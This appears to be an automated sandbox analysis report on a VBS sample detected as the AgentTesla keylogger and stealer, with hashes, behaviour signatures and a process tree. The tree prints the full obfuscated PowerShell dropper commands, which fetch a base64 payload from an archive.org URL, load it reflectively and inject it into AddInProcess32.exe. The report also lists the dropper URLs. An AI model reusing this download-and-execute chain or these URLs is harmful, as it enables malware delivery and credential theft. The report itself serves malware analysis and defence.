Overview

overview

10

Static

static

1

c7f2358c6d...84.vbs

windows7-x64

10

c7f2358c6d...84.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-10-2024 03:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c7f2358c6d043c69480de7d6bcffb1fc6c6467e21e5b3be0c84b6274d03ba284.vbs

  • Size

    491KB

  • MD5

    8619103fa6e661049111f4bbdd7fe0d2

  • SHA1

    ca586ed66ab95510af2af9fb380575e885f3c6eb

  • SHA256

    c7f2358c6d043c69480de7d6bcffb1fc6c6467e21e5b3be0c84b6274d03ba284

  • SHA512

    d649b396c6e3dcb8fa0517a9a157a17f8842e9c0899510ced40c04d557b3d3ea0dbd70a1236fff519ebbe9ea9c64426cbc8ae048b98995e51c501eed48896d2b

  • SSDEEP

    12288:NNjXVkBaQoLDBqKKcoXOZzIWPkETDuQnL3Qu5toTmP18cEuL9M7y8q8+01SB0WKg:y4cUteD9aS4Bh

Score
10/10
agenttesladiscoveryexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c7f2358c6d043c69480de7d6bcffb1fc6c6467e21e5b3be0c84b6274d03ba284.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4668
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzVFJJTmddJFZlUmJvU2VwUmVGRVJFbkNlKVsxLDNdKyd4Jy1qb0lOJycpICggKCdadFMnKyd1cmwgPSAnKyduY2EnKydodHQnKydwczovJysnL2lhNicrJzAnKycwMTAwLnVzLmFyY2hpJysndmUuJysnbycrJ3JnJysnLzInKyc0L2l0ZW1zJysnLycrJ2RldGEnKydoLW5vJysndGUtdi9EJysnZXRhaE4nKydvdGVWLnR4dG4nKydjYTtadFNiYXMnKydlJysnNjRDb250ZScrJ250ICcrJz0gJysnKCcrJ05ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQpLkRvd24nKydsJysnb2FkUycrJ3RyaScrJ25nKFp0U3VybCcrJyk7WicrJ3QnKydTJysnYmluJysnYXJ5Q29udGVudCA9JysnIFtTeScrJ3N0ZScrJ20uQ29udmUnKydyJysndCcrJ106JysnOkYnKydyb21CYXNlNjRTdHJpJysnbmcoWicrJ3RTYmEnKydzZTY0Q29udGVudCk7JysnWicrJ3RTJysnYXNzZW1ibHkgPScrJyBbUicrJ2VmbGVjdGlvbi5BJysnc3NlbWJseV0nKyc6OkwnKydvYWQoJysnWnRTYicrJ2knKyduJysnYXJ5Q29udGVudCcrJyk7WnRTdHlwZSA9IFp0U2FzJysnc2UnKydtYmx5LicrJ0dldFR5cGUoJysnbicrJ2NhUnVuUEUuJysnSG9tZW5jJysnYSk7WnRTbScrJ2V0aG9kID0gWicrJ3RTdHlwJysnZScrJy5HZXRNJysnZScrJ3RoJysnb2QobmNhVicrJ0FJbmNhJysnKTtadFNtZXQnKydobycrJ2QuSW52Jysnb2tlKFp0U24nKyd1bGwsJysnIFtvYmonKydlY3RbXV1AKCcrJ25jYXR4dC55bGQnKydyZm9jZS92ZWQuMnIuZDQzOCcrJ2Y3MTU1Y2M2ZScrJ2VhOTJkJysnMScrJzRlNicrJzAnKyc3NycrJzMnKyc3MjgnKycxYzQtYicrJ3UnKydwLy86Jysnc3AnKyd0dGhuYycrJ2EnKycgLCBuY2FkJysnZXNhdCcrJ2l2YWRvbmNhICwgJysnbmNhZCcrJ2VzYXRpJysndmFkb24nKydjYSAsJysnICcrJ25jYWRlc2EnKyd0aXZhZG8nKyduJysnY2EnKycsbmNhQScrJ2RkSW4nKydQcm9jZXNzMzJuJysnYycrJ2EsJysnbmNhJysnbmNhKSknKS5SZVBsQWNlKCduY2EnLFtTVFJJTmddW0NIYVJdMzkpLlJlUGxBY2UoJ1p0UycsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1104
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTRINg]$VeRboSepReFEREnCe)[1,3]+'x'-joIN'') ( ('ZtS'+'url = '+'nca'+'htt'+'ps:/'+'/ia6'+'0'+'0100.us.archi'+'ve.'+'o'+'rg'+'/2'+'4/items'+'/'+'deta'+'h-no'+'te-v/D'+'etahN'+'oteV.txtn'+'ca;ZtSbas'+'e'+'64Conte'+'nt '+'= '+'('+'New-Object Sy'+'stem.Net.WebClient).Down'+'l'+'oadS'+'tri'+'ng(ZtSurl'+');Z'+'t'+'S'+'bin'+'aryContent ='+' [Sy'+'ste'+'m.Conve'+'r'+'t'+']:'+':F'+'romBase64Stri'+'ng(Z'+'tSba'+'se64Content);'+'Z'+'tS'+'assembly ='+' [R'+'eflection.A'+'ssembly]'+'::L'+'oad('+'ZtSb'+'i'+'n'+'aryContent'+');ZtStype = ZtSas'+'se'+'mbly.'+'GetType('+'n'+'caRunPE.'+'Homenc'+'a);ZtSm'+'ethod = Z'+'tStyp'+'e'+'.GetM'+'e'+'th'+'od(ncaV'+'AInca'+');ZtSmet'+'ho'+'d.Inv'+'oke(ZtSn'+'ull,'+' [obj'+'ect[]]@('+'ncatxt.yld'+'rfoce/ved.2r.d438'+'f7155cc6e'+'ea92d'+'1'+'4e6'+'0'+'77'+'3'+'728'+'1c4-b'+'u'+'p//:'+'sp'+'tthnc'+'a'+' , ncad'+'esat'+'ivadonca , '+'ncad'+'esati'+'vadon'+'ca ,'+' '+'ncadesa'+'tivado'+'n'+'ca'+',ncaA'+'ddIn'+'Process32n'+'c'+'a,'+'nca'+'nca))').RePlAce('nca',[STRINg][CHaR]39).RePlAce('ZtS','$') )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1988
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
            PID:116
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2524
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2524 -s 1380
              5⤵
              • Program crash
              PID:4960
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2524 -ip 2524
      1⤵
        PID:3124

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        f41839a3fe2888c8b3050197bc9a0a05

        SHA1

        0798941aaf7a53a11ea9ed589752890aee069729

        SHA256

        224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

        SHA512

        2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        50a8221b93fbd2628ac460dd408a9fc1

        SHA1

        7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

        SHA256

        46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

        SHA512

        27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pvxqxh0y.2oq.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • memory/1104-0-0x00007FFB05A93000-0x00007FFB05A95000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1104-10-0x0000020EEA1F0000-0x0000020EEA212000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1104-11-0x00007FFB05A90000-0x00007FFB06551000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1104-12-0x00007FFB05A90000-0x00007FFB06551000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1104-29-0x00007FFB05A90000-0x00007FFB06551000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1988-22-0x000001DCA06D0000-0x000001DCA08DC000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/2524-23-0x0000000000400000-0x0000000000440000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2524-30-0x0000000005000000-0x00000000055A4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/2524-31-0x0000000004B50000-0x0000000004BB6000-memory.dmp

        Filesize

        408KB

        Download